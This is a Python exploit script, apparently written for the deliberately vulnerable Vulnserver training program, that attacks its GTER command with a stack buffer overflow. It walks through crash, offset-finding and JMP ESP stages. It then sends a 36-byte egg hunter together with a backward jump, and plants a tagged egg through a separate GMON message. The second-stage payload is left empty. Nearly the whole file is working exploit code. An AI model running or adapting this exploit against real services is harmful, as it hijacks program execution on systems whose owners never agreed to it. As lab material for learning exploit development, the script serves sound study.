vulnerserver_gter.py
#!/usr/bin/python
import socket
import os
import sys
from struct import pack
import time
# Target endpoint from the command line; send_msg() reads both module globals.
host, port = sys.argv[1], int(sys.argv[2])

# Second-stage bytes the egg hunter is meant to locate; intentionally left
# empty in this file (placeholder for the payload to be added).
payload = b""

# 36-byte egg hunter stub, kept byte-for-byte; split across lines only for
# readability.
egghunter = (
    b"\x66\x81\xca\xff\x0f\x42\x52\xb8\x3a\xfe\xff\xff"
    b"\xf7\xd8\xcd\x2e\x3c\x05\x5a\x74\xeb\xb8\x77\x65"
    b"\x62\x30\x89\xd7\xaf\x75\xe6\xaf\x75\xe3\xff\xe7"
)

# Four-byte egg tag; the GMON message further down sends it twice in a row
# directly in front of the payload.
egg = b"web0"
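def send_msg(buffer):
    """Connect to host:port, print the banner, send *buffer*, print the reply.

    Reads the module-level ``host`` and ``port``. One TCP connection is opened
    per call and always closed again, even when connect/recv/send raises.

    Args:
        buffer: bytes to send after the first server message has been read.

    Raises:
        OSError: propagated from the socket calls (connection refused, reset
            by a crashed peer, etc.); the caller decides whether to continue.
    """
    # The context manager guarantees close() on every exit path; the original
    # leaked the descriptor whenever recv() or send() raised before close().
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.connect((host, port))
        print(s.recv(1024))
        # sendall() retries until the whole buffer is written; send() may
        # return after a partial write and the script would never notice.
        s.sendall(buffer)
        print(s.recv(1024))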
# Each numbered stage below rebinds `buffer`; only the final binding (stage 4)
# is sent at the bottom of the file. Stages 1-3 are kept as a record of the
# earlier iterations and have no effect at runtime.
# 1 - Crash
buffer = b"GTER "
buffer += b"A"*1000  # 5-byte command prefix followed by 1000 filler bytes
# 2 - Offsets
buffer = b"GTER "
# Non-repeating 3-character groups; per the stage label, used to find an offset.
buffer += b"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
# 2.b - Check offsets + JMP ESP
# Address packed as a little-endian 32-bit signed int ("<i"). The trailing
# comment reads like a debugger breakpoint command; the value is target-specific
# and cannot be verified from this file.
jmp_esp = pack("<i", 0x62501203) # bp 0x62501203; g
buffer = b"GTER "
buffer += b"A"*151  # 5 + 151 = 156 bytes precede jmp_esp in the message
buffer += jmp_esp
buffer += b"B"*(1000-len(buffer))  # pad the message to exactly 1000 bytes
# 3 - JMP ESP and jump back
jmp_esp = pack("<i", 0x62501203) # bp 0x62501203; g  (same value as stage 2.b)
buffer = b"GTER "
buffer += b"A"*151
buffer += jmp_esp
# 5-byte near jump (E9 rel32) with displacement 0xffffff63 = -157, i.e. it
# jumps back toward the start of the message, as the stage comment says.
buffer += b"\xe9\x63\xff\xff\xff"
buffer += b"B"*(1000-len(buffer))
# 4 - Egghunter   <-- this is the `buffer` that is actually sent below
jmp_esp = pack("<i", 0x62501203) # bp 0x62501203; g
buffer = b"GTER "
buffer += b"\x90"*12  # 12 x 0x90 (x86 NOP) directly after the command prefix
buffer += egghunter
# Pad so jmp_esp again sits at message offset 156 (5 + 151), matching stages
# 2.b/3. len("GTER ") is a str length (5) mixed with bytes lengths; it works
# but is fragile. NOTE(review): should the NOPs + egghunter ever exceed 156
# bytes, the multiplier goes negative and bytes*negative silently yields b"",
# shifting jmp_esp with no error — a length check before this line is advisable.
buffer += b"A"*(151 + len("GTER ") -len(buffer))
buffer += jmp_esp
buffer += b"\xe9\x63\xff\xff\xff"  # same backwards jump as stage 3
buffer += b"B"*(1000-len(buffer))  # pad to 1000 bytes, as in every stage
# 4.b - Message with egg
# Sent first, over its own connection (send_msg opens one per call): the tag
# twice in a row ("web0web0"), 12 NOPs, then the payload — empty in this file.
msg_payload = b"GMON "
msg_payload += egg*2
msg_payload += b"\x90"*12
msg_payload += payload
send_msg(msg_payload)
# Fixed one-second gap between the two connections; presumably so the GMON
# message has been processed before the GTER message arrives — TODO confirm.
time.sleep(1)
send_msg(buffer)